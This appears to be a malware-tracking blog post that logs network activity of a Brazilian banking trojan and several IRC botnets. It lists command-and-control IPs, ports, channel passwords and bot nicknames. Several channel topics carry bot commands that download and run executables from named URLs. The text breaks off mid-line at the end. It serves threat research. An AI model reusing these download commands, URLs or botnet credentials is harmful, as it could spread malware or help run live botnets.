Author: Pig

pandafix.com.br (Banking Trojan hosted in Brazil Caxias Do Sul Comite Gestor Da Internet No Brasil)

This malware injects into notepad.exe.

notepad.exe – Network Activity

– DNS Queries:
dl.dropbox.com DNS_TYPE_A 50.16.240.166 107.20.132.92 107.20.134.231 107.20.135.122 107.20.207.68 174.129.232.94 184.73.245.80 23.21.195.136
www.comeciosilvaa.com.br DNS_TYPE_A 200.98.197.80 YES udp
www.pandafix.com.br DNS_TYPE_A 187.17.98.44 YES udp

– HTTP Conversations:
50.16.240.166:80 – [dl.dropbox.com] Request: GET /u/56787160/index.html Response: 200 “OK”
200.98.197.80:80 – [www.comeciosilvaa.com.br] Request: POST /avisosgordim/index.php Response: 404 “Not Found”
187.17.98.44:80

199.19.105.67 (ngrBot hosted in United States Clarks Summit Volumedrive)

Remote Host / Port Number
199.15.234.7 80
200.121.52.63 80
199.19.105.67 1085

PASS mypass
NICK n{US|XPa}wwphlrx
USER wwphlrx 0 0 :wwphlrx
JOIN #boss secret
PRIVMSG #boss :[DNS]: Blocked 0 domain(s) – Redirected 6 domain(s)
[#boss] [ Topic: !up http://www.bairesac.com/exploradore.exe 190416f04cfb5877642f69b8f59708dd ]

hosting infos: http://whois.domaintools.com/199.19.105.67

46.166.140.140 (ngrBot hosted in United States Amsterdam Santrex Internet Services Ltd)

Remote Host / Port Number
199.15.234.7 80
46.166.140.140 6667

PASS secret
Clients: I have 111 clients and 0 servers
Local users: Current Local Users: 111 Max: 205
Global users: Current Global Users: 111 Max: 205
NICK n{US|XPa}mthtknh
USER mthtknh 0 0 :mthtknh
JOIN #bone peruch
Now talking in #bone
Joins: {ESP|XPa}tyxdvpo [tyxdvpo@594ABF0E.765DC855.6CB32CB6.IP]
Joins: {PE|W7u}ldbnzwu 12[15ldbnzwu@22B3CEAE.9F16B729.F84BD3C2.IP]
hosting

108.163.164.154 (irc botnet hosted in Canada Verdun Iweb Technologies Inc)

Remote Host / Port Number
108.163.164.154 1863

MODE {XPUSA706826} -ix
PRIVMSG #per1 : 14,1. 15:: 11iMBot 9[Actualizacion] Iniciando descarga: 63.5KB a: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_02130.exe @ 31.8KB/sec.
QUIT 3,1 Actualizando al nuevo binario
NICK {XPUSA48968}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA48968} -ix
JOIN #per
JOIN #per1

hosting infos: http://whois.domaintools.com/108.163.164.154

fasterthanhim.com (ngrBot hosted in Russian Federation Llc Komplit Plyus)

Domains used for the botnet:
chicken1000.mooo.com 127.0.0.2 not active yet
api.wipmania.com 199.15.234.7
fasterthanhim.com 91.226.78.31 active
sad-stone.com NONE not active yet
sad-stone.com.local NONE not active yet

C&C Server: 91.226.78.31:8765
Server Password:
Username: dxvzrjf
Nickname: n{DE|XPa}dxvzrjf
Channel: #GODS (Password: secret)
Channeltopic: :~up http://www.emprender.edu.co/media/system/js/war.exe 24e3da41454dcbe517037d306c644245 ~mdns http://www.farmaciavirtual.com.co/pruebas/z.txt

sample here and here
hosting infos: http://whois.domaintools.com/91.226.78.31

37.59.74.224 (irc botnet hosted in OVH ISP Paris, France)

Remote Host / Port Number
37.59.74.224 6665

PASS google_cache2.tmp
NICK new[fbe-XP-USA]286504
USER 0348 “” “TsGh” :0348
PONG :901E418A
JOIN #G u12344u
Now talking in #G
Topic On: [ #G ] [ ]
Topic By: [ inm ]
Joins: [fbe-XP-YEM]541433 [5414@0wn3d-F3F21148.dynamic.yemennet.ye]
Joins: [fbe-XP-SAU]731906 [4962@84EEFA9B.2199BF6.97E20028.IP]
Joins: [fbe-XP-SAU]000244 [0002@37AB46F7.7A8C2D64.C25393E1.IP]
Joins: [fbe-XP-SAU]737710 [7377@C250848.3BBB233E.5822195F.IP]
Joins: [fbe-XP-SAU]372114 [3721@DFD745AA.8F1AA4B1.A97334FE.IP]
Joins: [fbe-W7-USA]180197 [0792@4A76F5E6.CCDF15C9.3AA76D10.IP]
hosting

213.239.195.4 (irc botnet hosted in Germany Gunzenhausen Hetzner Online Ag)

Remote Host / Port Number
213.239.195.4 2345

MODE New[USA|00|P|46215] -ix
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
JOIN #!loco!
PONG 22
MOTD
Channel Topic for Channel #!loco!: “.m.s|.m.e ehaha foto http://goo.gl/ymh4i?=”
Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.”
Private Message to Channel #!loco!: “[M]: